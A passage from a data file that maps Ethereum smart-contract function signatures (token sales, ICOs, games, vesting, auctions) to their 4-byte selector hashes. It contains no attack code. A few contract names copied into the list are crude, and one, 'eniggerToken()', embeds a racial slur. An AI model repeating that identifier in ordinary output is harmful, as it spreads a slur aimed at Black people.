"JPY_Omnidollar()": "0xc3ba938d", "gwtoken(uint256,string,uint8,string)": "0xde3d0290", "MNLTToken()": "0xbaac2178", "lockup(address,uint256)": "0xa7b86824", "lockupOf(address)": "0xadf9ffea", "StartupToken()": "0xd7dde189", "BitMilleCrowdsale()": "0x5ca21490", "constrcutor()": "0xa23bec7b", "getFreeFuck()": "0x5d000c07", "buyFucks()": "0x57f232e1", "sellFucks()": "0x8d3fd859", "makeTJs(address)": "0xf8aabbd9", "TJFucks()": "0xd9b36043", "EPACOIN()": "0x18b4a702", "EtherAdvance()": "0xd436b6e2", "spin(int256)": "0x26638a38", "getCurrentDisplacement()": "0x76bf2392", "getCurrentVelocity()": "0x359320de", "deltaTime()": "0x369ac28f", "FidgetSpinner(uint256,uint256)": "0x048e8c3a", "FintechChain()": "0xd763f92d", "OneOhana()": "0x6404865e", "setPoWtfContract(address)": "0x53b239c7", "Etbccoin()": "0xaba683fa", "CJXToken()": "0xe22fb860", "SpiceToken()": "0x25d8a4b2", "totalRedemptionIdValue(address,uint64)": "0xb41a9f22", "redemptionInfo(address,uint64)": "0xf2bddf66", "redemptionCount(address)": "0xf6b97131", "isBurnWallet(address)": "0x7334b2d7", "addBurnWallet(address)": "0x0a9e24c1", "lockInfo(address,uint64)": "0xf6a3e8c8", "lockCount(address)": "0xdf034586", "unlockTokens(address,uint64)": "0x43cdc49e", "TokenGMCT(uint256,string,string)": "0xea0a73d2", "advancedNETH(uint256,string,string)": "0xbb818ea6", "NETHtoken(uint256,string,string)": "0xa988ea3a", "Xenon()": "0x92b9fe8b", "bet1000_001eth()": "0xef33f8f0", "DEMT()": "0xde024515", "BucksCoin()": "0x58950108", "setRatePerOneEther(uint256)": "0x40217786", "setMoneyWallet(address,address)": "0xec6a4487", "registerUBetCheck(address,string,string,string,string,string,uint256,string,string,int256,uint256)": "0x04e5a069", "distribute(address,address)": "0xa18cd06c", "SAGAToken()": "0xde3ea04a", "ImperialCredits()": "0x9cb21f6d", "destroyCredits(uint256)": "0x23fd0176", "icoClose()": "0x2446e1de", "icoWithdraw()": "0xfbfa49a8", "payOutJackpot()": "0xb7c14d7a", "b66ReserveTokens()": "0x0265190c", "teamPot_()": "0xd78e1bb1", "ico2Tokens()": "0x408e2eb4", "GOAL_REACHED_CRITERION()": "0x8285d272", "selfHybridizationPrice()": "0xe51bfd9a", "lastEfficientBlockNumber()": "0xee832165", "tokenCreationMaxPreICO()": "0x22da5d04", "preIcoStartTime()": "0x910f5b81", "advisorySupplyRemaining()": "0xb0267126", "storedValue()": "0x6d619daa", "wdBefore()": "0x6d704159", "currentTimeIndex()": "0xcf40bb58", "PRE_ICO_POOL()": "0x7262eb66", "BTCPrice()": "0xc4f0a043", "tokenAdministrator()": "0x547505e3", "totalSeedStage()": "0x20d3fc20", "tokensRaised()": "0x6ea6b71b", "birthPerTen()": "0x0a4c374a", "miningIncentiveTokens()": "0x6fa64cd6", "burnable()": "0xa07c7ce4", "pauseLastStart()": "0xc4bebd69", "countdown()": "0xcba88872", "TUI_ALLOCATION()": "0xf9d630a1", "WALLET_T8EX_COMMUNITY()": "0xff71c6b0", "avarageBlockTime()": "0x8e74a528", "dias()": "0xab6db199", "dayLimit_()": "0x2b44fd38", "usdCap()": "0x6298c93a", "totlePrimary()": "0x9675bb9c", "publisherCut()": "0x060a56dc", "preICOStage()": "0xaa28b89f", "vestingWhitelister()": "0xdfae7dc1", "teamTokensInitial()": "0xdcb7e083", "dateICO()": "0x3b19d67a", "MAX_ALLOWED_BY_STAGE_2()": "0x7c5e16fd", "CoinStorage()": "0xe4a6e85a", "payto2()": "0xd6a595ac", "forceEnd()": "0x4ee0ab0d", "spermlordReq()": "0x2643fc13", "Tier_Wildcat()": "0x6557a47c", "_preSaleSupply()": "0x96687919", "mainSaleprice()": "0xb7742856", "scannedDiamondCaps()": "0x6854df55", "MilestoneCashBackTime()": "0x446dde9b", "withdrawAmount()": "0x534844a2", "AddAuthority()": "0x5dc43f6e", "startDateOfRestoreUnsoldTokens()": "0x9e697cd3", "deliveryId()": "0xec29781e", "tokenDescription()": "0x25e6f516", "bl()": "0x82357105", "snapshotBlockHeight()": "0x7659de23", "preIcoEndAt()": "0xd91d81c6", "neumark()": "0xe97b97fe", "LastRiskPrice()": "0xaa4ee730", "emergencyAndHiddenCapToggle()": "0x8a5ddd9b", "MAX_RELEASE_DATE()": "0x323b2c26", "finalize3()": "0xb7992c0b", "m_unclaimedHolderIdx()": "0x3b9f7d6b", "isExec()": "0x590efee1", "GigsToken()": "0xbd042ca6", "totalFreezeTokens()": "0x2caafb54", "phase2StartTime()": "0xed6bd807", "unblockSecondStake()": "0x4c574afe", "reserveWaveLockup()": "0xd242b051", "THIRD_PARTY_LOCKUP_ADDR()": "0x7457412e", "ApplicationInFundingOrDevelopment()": "0x70be61d1", "startDonations()": "0xf628e8e8", "escrowAddress()": "0x0d5defa4", "dedeNetwork()": "0x1c1d7517", "presaleStartBlock()": "0x4cb79536", "currTime()": "0x1a6af7b7", "privateMaxEtherCap()": "0x523a0b0d", "ObirumTalk()": "0x2c4ee4d4", "startTimeMain()": "0x79a34619", "bonusPeriodDurationInHours()": "0xc55e0eaa", "minPriceForMiningUpgrade()": "0x503248fe", "saleclosingTime()": "0xcdee2b92", "CROWDSALE_ETH_IN_WEI_ACCEPTED_MIN()": "0xa264f18e", "projectFailed()": "0x3db1c253", "fifthTime()": "0x25feb519", "breakevenLevel()": "0xa4ccd1ba", "maxTransfers()": "0x445d1397", "MAIN_HOLDER_ADDR()": "0xa73ee331", "isInPresale()": "0xd4cdeb3c", "investorsTokens()": "0x92c00f3c", "numRentStatuses()": "0x481fb72a", "initialIssue()": "0x8d298851", "PLATINUM_AMOUNT_NDC()": "0x4b7a5cc6", "depositTo()": "0x06a248c6", "VESTING_START_TIME()": "0x6c0b1e8c", "buyKWHAgainstEther()": "0x85cfdec7", "marketTime()": "0x7b834bcc", "promoCreationPlayerCount()": "0x58b8dc61", "individualMinCap()": "0xd1614df3", "ADVISORS_AND_PARTNERS_PER_CENT()": "0xf8c3a293", "initialTokenOwner()": "0x8dac7191", "bids_decrypted_count()": "0xc8135ba1", "__address2__()": "0x10bd6d2b", "fairsaleProtection()": "0xe0ceb25b", "minimumEpochInterval()": "0x55cacda5", "nextMinimumEpochInterval()": "0x455dc46d", "nextSlasher()": "0x21a2ad3a", "numDarknodes()": "0x1460e603", "numDarknodesNextEpoch()": "0x0847e9fa", "ren()": "0x8a9b4067", "trade(address,address,uint256,address,address,uint256,uint256,address,bytes)": "0x2a7a80a4", "setSanityRates(address[],uint256[])": "0xf5db370f", "tokenRate(address)": "0xc57fbf90", "getSanityRate(address,address)": "0xa58092b7", "setReasonableDiff(address[],uint256[])": "0x5c53ec59", "reasonableDiffInBps(address)": "0x5463a2e4", "addReader(string,address)": "0x16011bf1", "createLockbox(string,address,uint256,uint256,string,string,string,address[],string)": "0x773e236b", "requestOutput(bytes4)": "0x786fb317", "executeSigned(address,uint256,uint256,address,bytes)": "0x154b3f4c", "hashRequest(address,address,uint256,uint256,address)": "0x51788439", "reject(uint256,address,uint256,uint256,address)": "0x6d6ead75", "approve(uint256,address,uint256,uint256,address)": "0x162927b6", "request(address,uint256,uint256,address)": "0x9193b2e3", "setSpendingLimit(address,uint256)": "0xc9a815bd", "executeTransfer(address,uint256,address)": "0x098dbf5c", "setWallet2(address)": "0x3ccb6c31", "setWallet1(address)": "0xd52a7cbf", "setNewWallet2(address)": "0x522f9585", "setNewWallet1(address)": "0x0a41442f", "Daily()": "0x4523be0d", "save(bytes32)": "0x4053c797", "managePlayer(uint256,uint256)": "0x0f97f2f1", "core(uint256,uint256,uint256,uint256,uint256)": "0x8090e4d5", "reLoadCore(uint256,uint256,uint256,uint256)": "0xdf6f023d", "buyCore(uint256,uint256,uint256)": "0x47ef55fe", "getPlayerKeys(uint256,uint256)": "0x23abea43", "getPlayerInfoByAddress(address,uint256)": "0xba85571c", "getCurrentRoundInfo(uint256)": "0x0c66adf8", "iWantXKeys(uint256,uint256)": "0x743c006b", "addRoundMode(uint256,uint256,uint256)": "0x9d8c428e", "ClubToken()": "0x3a7d8df3", "setStopDay(uint256)": "0x0d729abc", "getAllETH(address)": "0x2187bdca", "getETH(uint256,address)": "0x985dea23", "Veetune(uint256)": "0x60834493", "getInfoFromBidding(bytes,bytes32)": "0x3290bd90", "getInfoFromCreateAuction(bytes)": "0x2b4a2d0a", "getDepotEth(address)": "0x0dc16a56", "subDepotEth(address,uint256)": "0xe14df8b7", "addDepotEth(address,uint256)": "0x9df06411", "setMaintenanceLock(bool)": "0xc75bc4fb", "setMigrationLock(bool)": "0xc8149cbc", "ecrecoverSigner(bytes32,bytes,uint256)": "0xe01a38c6", "uintMinimalSize(uint256)": "0x2239d43b", "toRlp(uint256)": "0xbb17a938", "getSpinResults(uint256,uint256,uint256,address)": "0x33d634df", "getSpinOutput(uint256,uint256,uint256,address)": "0x1be0f1ad", "NewIntelTechMedia(address)": "0xce41d75d", "SCT(uint256,string,uint8,string)": "0x6518361e", "purchaseTokensfor82(uint256,address,uint256)": "0x98de4f35", "setContractActive(bool,bool)": "0x61bec256", "set82Mode(bool,bool)": "0x8b51365b", "setBool82(bool,bool)": "0x12263017", "transferAndCallExpanded(address,uint256,bytes,address,address)": "0x7f3f3398", "buyTokensfor82()": "0x9d340b71", "BlueChipGame()": "0x5cb7dd98", "FDKToken()": "0x5ba32008", "OPTCToken()": "0xfd904207", "Tithe()": "0xf2415183", "setCanWithdrawBeforeEnd(bool)": "0x00db90d1", "setMaxGoal(uint256)": "0xc435ae0c", "maxGoalReached()": "0xd16712ed", "PORNCASH()": "0x38c3d4ed", "Alluma()": "0xb3da6eed", "insurance_Token()": "0x8222a5ce", "createIpo(address,uint256,uint256,string,string)": "0x8a905482", "finalizeIPO()": "0x9aecea62", "isIpoPeriodOver()": "0x22928b4d", "depositDividends()": "0xdefa92ee", "updateDividends(address)": "0xa1972fc4", "isTokenHolder(address,address)": "0x067fc6dd", "increaseTokenCap(uint256)": "0x677978ec", "ArtificialNeuralNetwork()": "0xa3a40323", "ShalloToken()": "0xff23e1eb", "BurnToken(address,address,uint256)": "0x048cc4a2", "_authorizePayment(address,uint128)": "0xfc53fe51", "closeContest(uint32)": "0x3083ab1f", "payWinners(uint32,uint32,uint256,bool,uint32,uint32)": "0x2ce47de4", "numWinnersToPay(uint32)": "0x39e301ff", "prepareToPayWinners(uint32)": "0x8e120f36", "getWinningPosition(uint32)": "0x1110b13a", "scoreTeams(uint32,uint32[],int32[],uint32[],uint32,uint32)": "0x0b66c247", "prepareToScore(uint32)": "0x23bb1f69", "getContestTeam(uint32,uint32)": "0xa9b76504", "getIndexForTeamId(uint32,uint32)": "0xf41293c7", "getContestTeamCount(uint32)": "0x6887398d", "getContest(uint32)": "0xe1486ea8", "updateContestTeam(uint32,uint32,uint8[],uint32[])": "0xf384632c", "releaseTeams(uint32,uint32[])": "0x84a6a68a", "cancelContest(uint32)": "0x24ec6f66", "exitContest(uint32)": "0xecc18582", "enterContest(uint32,uint32[])": "0x2dda04fa", "createContest(string,address,uint32,uint64,uint64,uint128,uint128,uint32,uint32,uint8,uint32[])": "0x6c4019f4", "RefundToBuyers()": "0xbfd431d1", "getUnsoldTokensBack()": "0x047fe8b3", "remainingTokensForSale()": "0x9b39f9bf", "determineBonus(uint256,uint256,address)": "0x2c68fcd4", "addTeamAndAdvisoryMembers(address[])": "0x78f1a5ce", "addICOEndDate(uint256)": "0xe40d8fc3", "addPreSaleEndDate(uint256)": "0x5d121289", "addPrivateSaleEndDate(uint256)": "0xc641aaca", "addPreSaleBuyer(address,uint256)": "0x7c437918", "addPrivateSaleBuyer(address,uint256)": "0x4de8a799", "erc20ECT(uint8)": "0x78a2157a", "pomda()": "0x52f17ce9", "setFightsAddress(address)": "0x325c35c5", "ELEXTROCOIN()": "0x6f3be6b7", "issueTokens(uint256)": "0xa5820daa", "BitrustToken(address,address,address,uint256)": "0x5aea9905", "HOLODECKS()": "0x2e788faf", "Travelcash()": "0x256b8dfe", "EPSCoin()": "0x43ab599f", "PrandexBountyToken()": "0xf573864f", "XxxTokenSale()": "0xd757579e", "_createMeme(uint256,string,address,uint256)": "0xe213e10a", "setRobot(address)": "0x3f7eabc9", "setDoge(address)": "0xbd025a79", "getMeme(uint256)": "0x3dea6b9a", "createContractMeme(uint256,string)": "0x27f93e59", "createUserMeme(address,uint256,string,uint256)": "0xb36eaad8", "createPromoMeme(address,uint256,string,uint256)": "0xa894878d", "MemeToken()": "0x9faceee4", "GICTBalance()": "0x98c8bde6", "GICTLock(address,uint256,uint256,uint256)": "0x5e2d285a", "GlobalIdolCoinToken()": "0x4ca0a305", "changeBirthSettings(uint256,uint8,uint8)": "0xe5a23e7e", "changeRepoSettings(uint256,uint8,uint8)": "0x435afa54", "changeVisitCosts(uint256,uint256,uint256,uint256,uint256,uint256)": "0xdde0523f", "changeVisitLengths(uint256,uint256,uint256,uint256,uint256,uint256)": "0x0be80fa9", "changeGroveAddress(address)": "0x5d956b3e", "donateUnicorns(uint256)": "0xd1651786", "repossessBooking(address,uint256)": "0xb9b94997", "completeBooking(uint256)": "0x1a2b3431", "bookExtendedVisit(uint256)": "0x39eb54d2", "bookWeekVisit(uint256)": "0xed15863a", "bookOvernightVisit(uint256)": "0x940900b8", "bookDayVisit(uint256)": "0x9379077f", "bookAfternoonVisit(uint256)": "0x671d3315", "bookSpaVisit(uint256)": "0xdba31911", "getBookingCount(address)": "0x3ca19952", "UnicornRanch()": "0xaaba2fb8", "previous(uint256)": "0x3c311f3c", "next(uint256)": "0xedd004e5", "values()": "0x971217b7", "contains(uint256)": "0xc34052e0", "Vesting(address)": "0xf72f30e1", "calculateWithdrawable()": "0xf0c69e8d", "isVestingStarted()": "0x381cec91", "isBeneficiary()": "0x7b70209f", "approveTransfer(uint256,address)": "0xa4086854", "bidCC(uint256,bytes32)": "0x84d9bee2", "auctionExpired()": "0x6a3f5146", "auctionStarted()": "0xee2679bc", "_escrow(uint256)": "0x193a824e", "getAuctionData()": "0x6a67acc5", "createAuction(uint256,uint256,uint256,uint256,address,uint256)": "0x28012606", "Booko()": "0x0fc03687", "GOLDQ()": "0xd9a8e212", "stopPreIco_step2()": "0xbf70bd75", "stopPreIco_step1()": "0xff3d1be0", "getDataHoldersRefBonus(address)": "0xcd74096a", "setAffiliateContract(address,address)": "0xcf77c8db", "BMPre_ICO()": "0x08aa3567", "setSaleStatus(bool,bool)": "0xb274e48e", "getEthRate(uint256)": "0x0859e844", "transferToOwner(uint256)": "0x87c1ed12", "acceptOnwership()": "0x640241b8", "eniggerToken()": "0xa447089e", "reclaimTokens(address[])": "0x05e1c942", "changeExtendedTime(uint256)": "0xfd3ecae6", "tokenProcess(address)": "0xc6ff4081", "tokenWithdraw(address)": "0xb5558562", "tokenDeposit(address,uint256)": "0x443f41d5", "tokenInWhiteList(address)": "0x1dd15fca", "addTokenWalletInWhitelist(address)": "0xaebe5523", "isInWhiteList(address)": "0x96bfc229", "addAddressInWhitelist(address)": "0xc72e1576", "TokenSaleQueue(address,address,address,address,uint256,uint256,uint256)": "0x6a221688", "SHOP()": "0x45e3b8c0", "toHex(address)": "0x5a275879", "buildUrl(address,uint256,uint256)": "0x9eeb79b2", "parseJsonArrayAndGetFirstElementAsNumber(string)": "0x00865f92", "LastWillContractOraclize(address,address[],uint8[],uint256)": "0xff5ff81f", "isTarget()": "0xb055fdf2", "doCheck()": "0xf1f339ef", "accident()": "0xec654e38", "testDistribute(uint256,address[],uint8[])": "0xfc3c8561", "LastWillContract(address,address[],uint8[])": "0x5cd31e83", "NewToken()": "0x7af3670c", "CryptobullsCoin()": "0x389b5bd2", "DOG_Crowdsale()": "0xf1c4d6b0", "transferToContract(address,uint256,bool,bytes)": "0xac0ab476", "transferToAddress(address,uint256,bool,bytes)": "0x3e86a2e5", "numberFor(uint256)": "0x4f67bd9e", "dayFor(uint256)": "0xd90c1759", "startup(uint256,address)": "0xc75782be", "NTVToken()": "0x670ca672", "getMutalbeInfo()": "0xe91b3ac5", "getShowTextBytes96()": "0x932a0ee7", "getShowText()": "0xf3217345", "auditText(uint8,string)": "0xbfafa8e6", "getTextBytes96()": "0x6fd5ab58", "setText(string)": "0x5d3a1f9d", "NTVUToken(uint8,uint256,uint256,uint256,uint256,uint256,bool,string,address)": "0xb3fb052a", "fromBytes96(bytes32,bytes32,bytes32,uint8)": "0x97c9085f", "ProofOfCraigGrant()": "0x71c6dc50", "MainSaleBuy()": "0x7034d190", "PreSaleBuy()": "0x6e6beb07", "PrivateSaleBuy()": "0x9a28910a", "CalcToc(uint256,uint256,uint256)": "0xc76c68d0", "SupplyOp(uint256,uint256,uint256)": "0x5d15001e", "AuthAddr(address,address,address)": "0x35a26787", "GetTocPrice()": "0x33b91db5", "GetEtherPrice()": "0x8dac0e8c", "GetEnd()": "0xda3d23a9", "GetMainSale()": "0xc466313c", "GetPreSale()": "0x282ba1b8", "GetPrivateSale()": "0xd7b32f5f", "GetSuspend()": "0x3f97b106", "UpdateState(uint256)": "0xf7fad9fc", "EtherPriceUpdate(uint256)": "0x394d57a2", "GeneralUpdate(uint256,uint256)": "0xc236cc66", "ToggleFreezeSelling()": "0x55434bc9", "ToggleFreezeBuying()": "0x23c4841e", "EtherToWei(uint256)": "0x4a50c3a7", "WeiToEther(uint256)": "0x9ece1d9c", "RetrieveFunds()": "0x8a7f1146", "SellTokens(uint256)": "0x9c7ebb30", "BuyTokens(address)": "0xf355b92d", "ChangeSellRate(uint256)": "0x8c2e6b3f", "ChangeBuyRate(uint256)": "0xff993a18", "VeritasToken()": "0xf500a0a3", "setPrivateSaleAddress(address)": "0xee2a0c12", "setControllerDelegate(address)": "0xffd85b68", "setWalletsDelegate(address)": "0x8063ab78", "getDelegate()": "0xbc7f3b50", "addWorker(address)": "0x806ad57e", "allWorkers()": "0xcb3eef2c", "isWorker(address)": "0xaa156645", "Linamyd()": "0x65bbb26a", "bless(string,uint256)": "0x1de250bf", "TonalQuantum()": "0x2069de94", "writeNextId(uint256)": "0x1bcdd57d", "moveMarketData(uint256[],uint64[],uint64[],uint128[],address[])": "0x82f2d8d7", "movePatentData(uint16[],address[],uint256[],bool[],uint256[],uint256[],uint256[])": "0xde326c1e", "moveFurnaceData(address[],uint16[],uint256[],bool[],uint256[])": "0xc79403f5", "moveAccountData(address[],bytes32[],uint256[])": "0x04812aaf", "disableMoving()": "0xbd8c5643", "buyInMarket(uint256,uint256)": "0x69d0b5e2", "changeSale(uint256,uint256,uint256,uint256)": "0x328243d5", "putOnSale(uint256,uint256,uint256)": "0x121c5e91", "clearZoDailyLimit()": "0x990ae727", "buyZoAssets(bytes32)": "0xbc27c7bb", "setZoPrice(uint256)": "0x3e31c77f", "getSynthesizationResult(address)": "0xa6113c0d", "getPatentFee(address,uint16[5],uint256)": "0xcec33f4e", "synthesize(uint16[5],uint256)": "0xaf5c6f38", "_isCooldownReady(address)": "0xd659afb6", "setSkinContract(address)": "0x2f1c935e", "setChemistryAddress(address)": "0xeb0db6ac", "getFurnace(address)": "0x57cfd296", "changeSynthesizeAllowed(bool)": "0x80c4e5c5", "setPatentFees(uint256[9])": "0xfce1e3e9", "setMaxCount(uint256)": "0xa35e617f", "setAssetLevel(uint16,uint256)": "0xf913b919", "initializeLevel()": "0xf883dfb5", "getActiveSkin(address)": "0x90cd6170", "computeCooldownTime(uint128,uint256)": "0x88c91d24", "turnOnFurnace(uint16[5],uint128)": "0x6d27a326", "turnOnFurnace(bytes32,bytes32,bytes32,bytes32)": "0x33377f32", "isChemistry()": "0x09bb03b4", "buyPatent(uint16)": "0xacbd9563", "changePatentSale(uint16,uint256)": "0x41dc02cf", "publicSell(uint16)": "0x6f5eb4b5", "sellPatent(uint16,uint256)": "0x2cdf2bfd", "setPatentFee(uint256)": "0x21ac8967", "transfer(address,bytes32[8])": "0x81f91c4a", "_checkAndSub(bytes32,bytes32)": "0x1ebebb9b", "_checkAndAdd(bytes32,bytes32)": "0x58078a5a", "assetOf(address)": "0x71f96211", "SendERC20ToDex(address)": "0xde2c1d09", "SendEtherToDex(uint256)": "0x3cde5627", "CollectERC20(address)": "0xcb8b4b83", "SendEtherToFund(uint256)": "0xf61f54c2", "NonIssueDeposits()": "0x04658ad8", "setRegistryAddr(address)": "0xc7fa52de", "getAddr(string)": "0xd502db97", "CortexCoin()": "0xc42c237a", "continueGeneration()": "0x6a12b86c", "hasConverted(address)": "0x3392f927", "generateTokens()": "0xa5e33048", "TIXToken(address)": "0x169fab66", "getStartIndex(uint64)": "0xe3f61948", "currentPriceChangeNumber()": "0xd4bc87d9", "security_address()": "0x7a72416f", "getTokensSale()": "0xa7b91780", "assistant()": "0x2569cd6c", "PERC_TOKENS_TO_BIZDEV()": "0x46912a4d", "MOT()": "0xc642f094", "getNumberTwo()": "0x08949a76", "allocatedToken()": "0xe4d1b2cc", "fundaria()": "0xd53f8208", "houseEdge()": "0xd667dcd7", "ASHLEY_ALLOCATION()": "0xcd679413", "MAJOR_VERSION()": "0xf786becd", "masterAddress1()": "0x86ee8f01", "foundersStake()": "0xa4d904ba", "pausecontract()": "0xaf6337fd", "acceptAdminWithdraw()": "0x8e818aa1", "holyBountyFundDeposit()": "0xfbf1a44b", "cap_max()": "0xdc4f63cc", "vestingPeriod()": "0x7313ee5a", "ACFWallet()": "0xe481c884", "numResponses()": "0xe98ebdd5", "bountyAvailabilityTime()": "0x67e988e7", "ethEur()": "0x5a71be21", "numclaimed()": "0x90347678", "teamTwo()": "0xd8e4f9d9", "AVG_BLOCKS_24H()": "0xae873405", "rateIco()": "0xef387a50", "tokenHardcapReached()": "0xd1c73322", "unlockMintDate1()": "0x02b857f3", "award()": "0x41a494c5", "updateTotal()": "0xc255fa40", "MANA()": "0xecb42795", "RATE_TIER2()": "0xee2127c8", "ico1Min()": "0x476810b5", "CollectibleIndex5()": "0xc8420d2f", "getAllPlots()": "0x925074ca", "depositor()": "0xc7c4ff46", "investorsLength()": "0x594337a9", "controllerDelegate()": "0x23aa7e12", "secondReserveAllocation()": "0x0d0a1901", "rateContract()": "0xeee24219", "preSale3Finished()": "0x94cec87b", "PRESALE()": "0xb4cf5648", "loseOdd()": "0xf00f7b33", "eventCardRangeMin()": "0xd77ff9ea", "locked_since()": "0x541ac2b3", "ethUsd()": "0x5a960216", "isBurnable()": "0x883356d9", "albosAddress()": "0x1ab08c61", "circulating_supply()": "0xe038c75a", "JackpotWinner()": "0xdf6adc2a", "calculatedReward()": "0xbf8dde4d", "RESERVE_LOCK_TIME()": "0xa06ced75", "saleType()": "0x5bcc7928", "SponsoredLink()": "0x464ae89f", "isOldVersion()": "0x15a38bda", "nxcPerBcy()": "0x2d03c4eb", "ICO_LEVEL_4()": "0x04df48ef", "isWithdrawAllowed()": "0x7e6d0fa0", "tickets100kprice()": "0x43f8c639", "chief()": "0xffd864d3", "burnt()": "0xb192da2d", "TIMER_STEP()": "0x7a3cbbe4", "tgeDateStart()": "0x9c50e7ca", "regular_coins()": "0xe40e56d3", "developmentAuditPromotionTokensPercent()": "0x3fabf8c0", "homeTeam()": "0xae989d36", "optionAddress()": "0x78013292", "deathData_f3()": "0xc6d32838", "roleAdminAddress()": "0xb7e90262", "crowdsaleTokenPriceDenominator()": "0x00e893ce", "cleanUpRounding()": "0xdd999ade", "m_active()": "0x6f0cd3a6", "sharesChainToken()": "0xdabbbd0b", "tokenRate15()": "0x37fd6128", "singleInvestorCap()": "0xaae9a4c7", "strayToken()": "0xd9ccf695", "teamSupply()": "0x2cfac6ec", "totalSupplyYear()": "0x2dd4f8d4", "activityCount()": "0xe6240deb", "isGameActivated()": "0x9585a877", "tomoDeposit()": "0xbe16dccd", "lastDao()": "0x02da6d06", "targetDiscountValue5()": "0xf0fbfd3a", "weekLength()": "0x55e9c358", "nextShareTime()": "0xeb52835b", "VOLUME_BONUS()": "0x72413a3b", "unlockDate2()": "0x23b1131c", "oldData()": "0x79efb507", "StageOneEnable()": "0xa72dc950", "foundersTokensUnlockTime()": "0x66a908a5", "SILVER_AMOUNT_NDC()": "0xa34dffba", "distributeSupply()": "0x5486dfb3", "tokenPriceForMainICO()": "0xc8d1cf4a", "Stage3Deadline()": "0xe93e7b26", "hasRandom()": "0xbb2c5ad7", "receivedStaAmount()": "0xa29ff28d", "totalExtraOptions()": "0x2b04451a", "ratePreICO()": "0x6fb66278", "dealAmount()": "0xdf0a8589", "InterfaceId_ERC165()": "0x19fa8f50", "TOKEN_SUPPLY_MKT()": "0x74b433bd", "runICO()": "0xc3d58d95", "minimumMainSaleRaise()": "0x00333375", "AVAILABLE_TOKENS()": "0x948e1a1c", "MAX_PRESALE_TOKENS_SOLD()": "0xe5514c9d", "totalWeiCap()": "0xadf9cd49", "masterAddress2()": "0x5ab027b0", "lastBlock_f9Hash_uint256()": "0xf3eeb84b", "getTotalPayouts()": "0x195f4807", "teamOne()": "0x356c22ec", "limitDateCrowdWave1()": "0x47d690b4", "Rate4()": "0xec343a97", "isBetClosed()": "0xd70d9254", "periodPreITO_mainCapInWei()": "0xd0f87ce7", "payFund()": "0x8974372d", "ERC721Address()": "0x574490cd", "proposeCount()": "0xc3210eb7", "pls()": "0x223e5a9d", "checkVotingForChangeBuySellLimits()": "0xf2bbca67", "chronoBankPlatform()": "0x49752baf", "tokensTeam()": "0xd92ca5b4", "RewardBonusTimePeriod()": "0xc9d82560", "tech()": "0x095f2f16", "totalWithdrawn()": "0x4b319713", "IsSaleEnabled()": "0x0ebdc43a", "earlyBackersPoolAddress()": "0xe25665da", "auditContract()": "0xd42d24fc", "startPostIco()": "0xea1d64b8", "stageTwoCap()": "0x4018e263", "free()": "0x1370128e", "lastDepositorAmount()": "0x8ea95cbc", "ecoSupplyAddress()": "0x7348ac1f", "lrcReceived()": "0x7267f24a", "FBLFounderFund()": "0x66671c30", "payments()": "0xa6d23e10", "JACKPOT_SIZE()": "0x9fff37e0", "TokenSCADAEntity()": "0x5b8315e4", "lockEmission()": "0x832df980", "scaledRewardPerToken()": "0xc4f7f1e2", "nextWithdrawDayFoundation()": "0x62a7c5a6", "maxResult()": "0x5d109aea", "teamTwoPrefix()": "0xafb058ce", "rngAddress()": "0x1d43776e", "layerCount()": "0x56e7f6c7", "poolReward()": "0xfef10b95", "RESERVE_ALLOWANCE()": "0x6625b349", "balanceToken()": "0xa30955af", "isInitialBlockTimestampSet()": "0x9aaac864", "window0TokenExchangeRate()": "0xedff2702", "contract_address()": "0x966b3514", "ObirumIssued()": "0xbea31228", "ATTR_CONSUMABLE()": "0x93e1595d", "rateWaiting()": "0xc730bbd8", "cumAlienDeposits()": "0x299f5f1a", "purposeWeiRate()": "0x9e4c1357", "tokenQuota()": "0x168cd7ae", "prometheusVouchersMinted()": "0x2ccdbc25", "developmentFundAddress()": "0xb88fd16e", "rake()": "0x22a7ac34", "totalEthRcvd()": "0x2b21502f", "lastCollection()": "0xbd6bbc31", "PRESALE_OPENING_TIME()": "0xf9956289", "multNumerator()": "0x22e3989b", "incentiveForHolder()": "0x2816bd78", "presaleUnlimitedStartTime()": "0x101e652e", "claimF()": "0x1ea1e522", "lotteryRatio()": "0x588f7e12", "founderVestingContract()": "0x9267a36d", "round0Bonus()": "0xe8a478ad", "ICOadvisor1()": "0x5a0718d0", "endICO_w2()": "0xbbe437eb", "brokerImp()": "0x0aba8ec2", "filmamount()": "0x7be296d8", "hydroTokenAddress()": "0x75d7e4bd", "rebateOneFenzi_()": "0x62d5acb1", "SEPARATOR()": "0x5d27e9a6", "totalContributedUnits()": "0x32484dab", "oldOwner()": "0xf487404f", "vestingEnds()": "0x7c64ac43", "startingTime()": "0x39518b5e", "lastBidTime()": "0x642ab4b1", "nextTicket()": "0xc7dbbc47", "yeedToken()": "0x82ad5ecf", "FLC_address()": "0x4d4479a8", "getBitsoAddress()": "0x3e5442bd", "totalWhiteListed()": "0xa07b206f", "period3Denominator()": "0x609bec67", "OWNERS_TOKENS_AMOUNT()": "0x0e21c886", "icoAmountBonus2()": "0x09ceb7be", "ICO_CAP2()": "0x96d46500", "goldContract()": "0xfc996557", "dayCycle()": "0x269106e9", "withdraw_to_reward_contract()": "0xa1731366", "phase1AccountTokensMax()": "0xe87a9d84", "latestNewRockForSale()": "0xaaf9419d", "startPriceForHLPMT()": "0xf5254af8", "product1_pot()": "0xae8bce2c", "TARGET_EVE()": "0xa369658c", "PreICOStartTime()": "0xadaf7c84", "nativeReputation()": "0x89ae1c90", "m_publiclyDistributedTokens()": "0x82deb6cd", "num_hosts()": "0xd4291e0c", "freezeSupply()": "0x7ec2402f", "TIME_TO_STALEMATE()": "0xac246c3e", "RANGEEND_11()": "0x6660ead1", "newModelShipProduct()": "0x52dbb027", "mCoinPerBlock()": "0xe6468b9f", "advisoryReserveTokens()": "0xf113f700", "vestingStartTime()": "0xa8660a78", "_FIVEHUNDRED()": "0xa2328e2e", "funder()": "0x041ae880", "sumICOStage1USD()": "0xd9948af7", "initializationDelay()": "0x5679623b", "gcf()": "0x814ae0ba", "CFO()": "0x30d500bf", "checkOwnerFailedToSetTimeOnMeeting()": "0x59adda9b", "rentals()": "0x4b802dde", "polyTokenAddress()": "0xeb5ba3b4", "ethDepositAddress()": "0xb420feb2", "congress()": "0x86b0befc", "ADVISORS_TOKENS()": "0x1923350f", "teamLocked()": "0xae82fcf4", "cardDrawPrice()": "0x93af339f", "weiExchangeRate()": "0xe3ff2f05", "investmentFundWallet()": "0x943215ae", "source()": "0x67e828bf", "totalTokensForSaleDuringICO2()": "0xc89924da", "MAX_PERIOD_COUNT()": "0x8e6a2afa", "RECEIVER_PAYOUT_THRESHOLD()": "0x2b2dc12e", "rateAngelsDay()": 